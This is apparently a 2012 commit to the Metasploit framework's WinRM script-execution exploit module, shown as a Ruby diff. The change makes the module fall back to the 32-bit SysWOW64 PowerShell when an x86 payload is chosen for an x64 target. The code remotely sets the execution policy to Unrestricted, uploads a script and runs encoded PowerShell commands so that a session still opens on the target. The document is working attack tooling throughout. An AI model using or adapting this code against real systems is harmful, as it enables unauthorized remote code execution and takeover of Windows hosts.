Add 32bit comapt mode for 64 bit targets on wirnm

David Maloney · David Maloney · commit e448431c8ac3 · 2012-12-10T11:39:24.000-06:00
When a 32 bit payload is selected for an x64 target using the powershell
2.0 method,
it will try to invoke the 32bit version of pwoershell to sue instead
allowing us to still get a session even with the wrong payload arch
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -83,7 +83,6 @@ def exploit
 			return
 		end
 		if powershell2?
-			return unless correct_payload_arch?
 			path = upload_script
 			return if path.nil?
 			exec_script(path)
@@ -127,15 +126,15 @@ def upload_script
 
 	def exec_script(path)
 		print_status "Attempting to execute script..."
-		cmd = "powershell -File #{path}"
+		cmd = "#{@invoke_powershell} -File #{path}"
 		winrm_run_cmd_hanging(cmd)
 	end
 
 	def encoded_psh(script)
 		script = script.chars.to_a.join("\x00").chomp
 		script << "\x00" unless script[-1].eql? "\x00"
 		script = Rex::Text.encode_base64(script).chomp
-		cmd = "powershell -encodedCommand #{script}"
+		cmd = "#{@invoke_powershell} -encodedCommand #{script}"
 	end
 
 	def temp_dir
@@ -173,11 +172,11 @@ def check_remote_arch
 	end
 
 	def correct_payload_arch?
-		target_arch = check_remote_arch
-		case target_arch
+		@target_arch = check_remote_arch
+		case @target_arch
 		when "x64"
 			unless datastore['PAYLOAD'].include? "x64"
-				print_error "You selected an x86 payload for an x64 target!"
+				print_error "You selected an x86 payload for an x64 target...trying to run in compat mode"
 				return false
 			end
 		when "x86"
@@ -218,8 +217,15 @@ def powershell2?
 			end
 		end
 
+		return false unless correct_payload_arch? or @target_arch == "x64"
+		if @target_arch == "x64"
+			@invoke_powershell = "%SYSTEMROOT%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
+		else
+			@invoke_powershell = "powershell"
+		end
+
 		print_status "Attempting to set Execution Policy"
-		streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
+		streams = winrm_run_cmd("#{@invoke_powershell} Set-ExecutionPolicy Unrestricted")
 		if streams == 401
 			print_error "Login failed!"
 			return false
@@ -228,7 +234,7 @@ def powershell2?
 			print_error "Recieved error while running check"
 			return false
 		end
-		streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
+		streams = winrm_run_cmd("#{@invoke_powershell} Get-ExecutionPolicy")
 		if streams['stdout'].include? 'Unrestricted'
 			print_good "Set Execution Policy Successfully"
 			return true
